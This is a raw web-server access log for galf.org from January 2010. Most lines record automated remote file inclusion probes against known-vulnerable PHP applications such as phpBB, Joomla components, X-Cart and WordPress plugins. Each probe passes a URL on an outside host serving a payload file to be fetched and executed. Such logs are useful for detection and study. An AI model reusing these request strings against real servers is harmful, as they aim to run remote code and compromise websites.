218.38.56.83 - - [10/Jan/2010:20:21:16 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [10/Jan/2010:20:21:16 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [10/Jan/2010:20:21:16 -0800] "GET /logs/access_100104.log%20%20//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [10/Jan/2010:20:21:21 -0800] "GET /logs/access_090928.log HTTP/1.1" 200 6638235 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
218.38.56.83 - - [10/Jan/2010:20:21:31 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [10/Jan/2010:20:21:31 -0800] "GET /logs/access_100104.log%20%20//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [10/Jan/2010:20:21:31 -0800] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [10/Jan/2010:20:23:32 -0800] "GET /logs/access.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/.vsh/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
124.0.94.62 - - [10/Jan/2010:20:23:32 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/.vsh/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
124.0.94.62 - - [10/Jan/2010:20:23:32 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/.vsh/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
124.0.94.62 - - [10/Jan/2010:20:23:45 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/.vsh/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [10/Jan/2010:20:23:45 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/.vsh/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [10/Jan/2010:20:23:46 -0800] "GET /logs/access_100104.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/.vsh/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [10/Jan/2010:20:24:12 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/.vsh/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
124.0.94.62 - - [10/Jan/2010:20:24:13 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/.vsh/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
124.0.94.62 - - [10/Jan/2010:20:24:13 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/.vsh/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
124.0.94.62 - - [10/Jan/2010:20:24:55 -0800] "GET /logs/access_100104.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/.vsh/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [10/Jan/2010:20:24:55 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/.vsh/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [10/Jan/2010:20:24:55 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/.vsh/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.151.70.1 - - [10/Jan/2010:20:27:06 -0800] "GET /logs/access_090907.log/////?_SERVER[DOCUMENT_ROOT]=http://www.earlywarninginc.com/.injek/injek.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
209.151.70.1 - - [10/Jan/2010:20:27:07 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.earlywarninginc.com/.injek/injek.txt? HTTP/1.1" 200 1050 "-" "libwww-perl/5.833" "www.galf.org"
209.151.70.1 - - [10/Jan/2010:20:27:07 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.earlywarninginc.com/.injek/injek.txt? HTTP/1.1" 200 4807 "-" "libwww-perl/5.833" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:20:28:08 -0800] "GET /appserv/main.php?appserv_root=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:20:28:08 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:20:28:09 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [10/Jan/2010:20:28:14 -0800] "GET /logs/access_090921.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/.vsh/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [10/Jan/2010:20:28:15 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/.vsh/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [10/Jan/2010:20:28:16 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://83.143.148.154:32000/accounts/inc/.vsh/index1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:20:28:16 -0800] "GET /appserv/main.php?appserv_root=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:20:28:26 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:20:28:26 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.16.1.22 - - [10/Jan/2010:20:28:29 -0800] "GET /logs/access_091228.log/admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:20:31:20 -0800] "GET /logs/access_100104.log//appserv/main.php?appserv_root=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:20:31:50 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [10/Jan/2010:20:32:19 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [10/Jan/2010:20:32:19 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [10/Jan/2010:20:32:19 -0800] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [10/Jan/2010:20:32:19 -0800] "GET /logs/access_090921.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [10/Jan/2010:20:32:19 -0800] "GET /logs/access_090921.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [10/Jan/2010:20:32:19 -0800] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [10/Jan/2010:20:32:20 -0800] "GET /logs/access_090928.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [10/Jan/2010:20:32:20 -0800] "GET /logs/access_090928.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [10/Jan/2010:20:32:21 -0800] "GET /logs/access_090803.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [10/Jan/2010:20:32:21 -0800] "GET /logs/access_090803.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:20:32:51 -0800] "GET /logs/access_100104.log//appserv/main.php?appserv_root=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:20:33:22 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:20:36:05 -0800] "GET /bbs/skin/zero_vote/error.php?dir=http://togas.ru/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:20:36:05 -0800] "GET /logs/access_091207.log//bbs/skin/zero_vote/error.php?dir=http://togas.ru/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:20:36:08 -0800] "GET /logs//bbs/skin/zero_vote/error.php?dir=http://togas.ru/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
64.34.177.222 - - [10/Jan/2010:20:36:18 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.177.222 - - [10/Jan/2010:20:36:18 -0800] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.177.222 - - [10/Jan/2010:20:36:19 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
217.16.1.22 - - [10/Jan/2010:20:38:39 -0800] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
217.16.1.22 - - [10/Jan/2010:20:38:39 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
217.16.1.22 - - [10/Jan/2010:20:38:39 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
65.55.51.115 - - [10/Jan/2010:20:39:32 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
200.93.147.154 - - [10/Jan/2010:20:41:46 -0800] "GET /songinfo.php?commonpath=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [10/Jan/2010:20:41:46 -0800] "GET /logs//songinfo.php?commonpath=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [10/Jan/2010:20:41:46 -0800] "GET /logs/access_090921.log%20%20//songinfo.php?commonpath=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [10/Jan/2010:20:41:51 -0800] "GET /logs//songinfo.php?commonpath=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [10/Jan/2010:20:41:51 -0800] "GET /songinfo.php?commonpath=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [10/Jan/2010:20:41:51 -0800] "GET /logs/access_090921.log%20%20//songinfo.php?commonpath=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:20:42:10 -0800] "GET /logs/access_091207.log/?DOCUMENT_ROOT=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:20:42:12 -0800] "GET /logs/access_091123.log/?DOCUMENT_ROOT=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.97.170 - - [10/Jan/2010:20:44:30 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
99.198.97.170 - - [10/Jan/2010:20:44:30 -0800] "GET /logs/access_091123.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
99.198.97.170 - - [10/Jan/2010:20:44:30 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
200.93.147.154 - - [10/Jan/2010:20:44:34 -0800] "GET /logs/access_091102.log%20%20//songinfo.php?commonpath=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.97.170 - - [10/Jan/2010:20:44:43 -0800] "GET /logs/access_091102.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
200.93.147.154 - - [10/Jan/2010:20:44:50 -0800] "GET /logs/access_091102.log%20%20//songinfo.php?commonpath=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [10/Jan/2010:20:47:22 -0800] "GET /logs/access_091207.log%20%20//bbs/skin/zero_vote/error.php?dir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [10/Jan/2010:20:47:22 -0800] "GET /logs//bbs/skin/zero_vote/error.php?dir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [10/Jan/2010:20:47:22 -0800] "GET /bbs/skin/zero_vote/error.php?dir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:20:49:56 -0800] "GET /logs//bbs/skin/zero_vote/error.php?dir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:20:49:56 -0800] "GET /logs/access_091207.log%20%20//bbs/skin/zero_vote/error.php?dir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:20:50:04 -0800] "GET /bbs/skin/zero_vote/error.php?dir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.102.243 - - [10/Jan/2010:20:51:45 -0800] "GET /bbshop/shop/index.php?_shop_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
83.170.102.243 - - [10/Jan/2010:20:51:45 -0800] "GET /logs//bbshop/shop/index.php?_shop_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
218.145.29.142 - - [10/Jan/2010:20:52:41 -0800] "GET /logs/access_090727.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.145.29.142 - - [10/Jan/2010:20:52:41 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
218.145.29.142 - - [10/Jan/2010:20:52:41 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 4807 "-" "Mozilla/5.0" "www.galf.org"
99.198.97.170 - - [10/Jan/2010:20:53:33 -0800] "GET /logs/access_091102.log%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
218.145.29.142 - - [10/Jan/2010:20:54:05 -0800] "GET /logs/access_090622.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.145.29.142 - - [10/Jan/2010:20:57:19 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 4807 "-" "Mozilla/5.0" "www.galf.org"
218.145.29.142 - - [10/Jan/2010:20:57:19 -0800] "GET /logs/access_091123.log/////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.145.29.142 - - [10/Jan/2010:20:57:21 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:20:57:25 -0800] "GET /logs/access_091207.log/?DOCUMENT_ROOT=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:20:57:36 -0800] "GET /logs/access_091123.log/?DOCUMENT_ROOT=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:21:01:56 -0800] "GET /logs/access_091207.log//bbs/skin/zero_vote/error.php?dir=http://togas.ru/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:21:01:57 -0800] "GET /logs//bbs/skin/zero_vote/error.php?dir=http://togas.ru/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:21:01:58 -0800] "GET /bbs/skin/zero_vote/error.php?dir=http://togas.ru/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
65.55.51.115 - - [10/Jan/2010:21:02:53 -0800] "GET /labia/?M=A HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:21:03:26 -0800] "GET /logs/access_091207.log//bbs/skin/zero_vote/error.php?dir=http://togas.ru/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:21:03:30 -0800] "GET /logs//bbs/skin/zero_vote/error.php?dir=http://togas.ru/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:21:03:30 -0800] "GET /bbs/skin/zero_vote/error.php?dir=http://togas.ru/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
67.195.37.161 - - [10/Jan/2010:21:08:00 -0800] "GET /logs/access_091102.log HTTP/1.0" 200 8742263 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:21:14:18 -0800] "GET /bbs/skin/zero_vote/error.php?dir=http://togas.ru/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:21:14:18 -0800] "GET /logs/access_091207.log//bbs/skin/zero_vote/error.php?dir=http://togas.ru/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:21:14:19 -0800] "GET /logs//bbs/skin/zero_vote/error.php?dir=http://togas.ru/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
65.55.106.204 - - [10/Jan/2010:21:15:17 -0800] "GET /logs/access_090622.log HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
218.145.29.142 - - [10/Jan/2010:21:15:37 -0800] "GET /logs/access_091207.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:21:24:09 -0800] "GET /logs/access_091207.log//bbs/skin/zero_vote/error.php?dir=http://togas.ru/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:21:24:09 -0800] "GET /bbs/skin/zero_vote/error.php?dir=http://togas.ru/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:21:24:09 -0800] "GET /logs//bbs/skin/zero_vote/error.php?dir=http://togas.ru/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
203.86.236.169 - - [10/Jan/2010:21:31:48 -0800] "GET /logs/access.log%20%20//admin/auth.php?xcart_dir=http://www.knxshop.fr//administrator/components/com_virtuemart/languages/coupon/.../k1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.86.236.169 - - [10/Jan/2010:21:31:48 -0800] "GET /admin/auth.php?xcart_dir=http://www.knxshop.fr//administrator/components/com_virtuemart/languages/coupon/.../k1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.86.236.169 - - [10/Jan/2010:21:31:48 -0800] "GET /logs/access_091214.log%20%20//admin/auth.php?xcart_dir=http://www.knxshop.fr//administrator/components/com_virtuemart/languages/coupon/.../k1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.86.236.169 - - [10/Jan/2010:21:31:48 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.knxshop.fr//administrator/components/com_virtuemart/languages/coupon/.../k1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.86.236.169 - - [10/Jan/2010:21:31:56 -0800] "GET /admin/auth.php?xcart_dir=http://www.knxshop.fr//administrator/components/com_virtuemart/languages/coupon/.../k1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.86.236.169 - - [10/Jan/2010:21:31:56 -0800] "GET /logs/access.log%20%20//admin/auth.php?xcart_dir=http://www.knxshop.fr//administrator/components/com_virtuemart/languages/coupon/.../k1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.86.236.169 - - [10/Jan/2010:21:31:56 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.knxshop.fr//administrator/components/com_virtuemart/languages/coupon/.../k1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.86.236.169 - - [10/Jan/2010:21:31:56 -0800] "GET /logs/access_091214.log%20%20//admin/auth.php?xcart_dir=http://www.knxshop.fr//administrator/components/com_virtuemart/languages/coupon/.../k1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.86.236.169 - - [10/Jan/2010:21:32:48 -0800] "GET /logs/access_090803.log//admin/auth.php?xcart_dir=http://www.knxshop.fr//administrator/components/com_virtuemart/languages/coupon/.../k1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.86.236.169 - - [10/Jan/2010:21:32:48 -0800] "GET /logs/access_090831.log//admin/auth.php?xcart_dir=http://www.knxshop.fr//administrator/components/com_virtuemart/languages/coupon/.../k1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.86.236.169 - - [10/Jan/2010:21:33:14 -0800] "GET /logs/access_090803.log//admin/auth.php?xcart_dir=http://www.knxshop.fr//administrator/components/com_virtuemart/languages/coupon/.../k1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.86.236.169 - - [10/Jan/2010:21:33:14 -0800] "GET /logs/access_090831.log//admin/auth.php?xcart_dir=http://www.knxshop.fr//administrator/components/com_virtuemart/languages/coupon/.../k1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [10/Jan/2010:21:33:34 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [10/Jan/2010:21:33:34 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.145.29.142 - - [10/Jan/2010:21:34:15 -0800] "GET /logs/access_091214.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
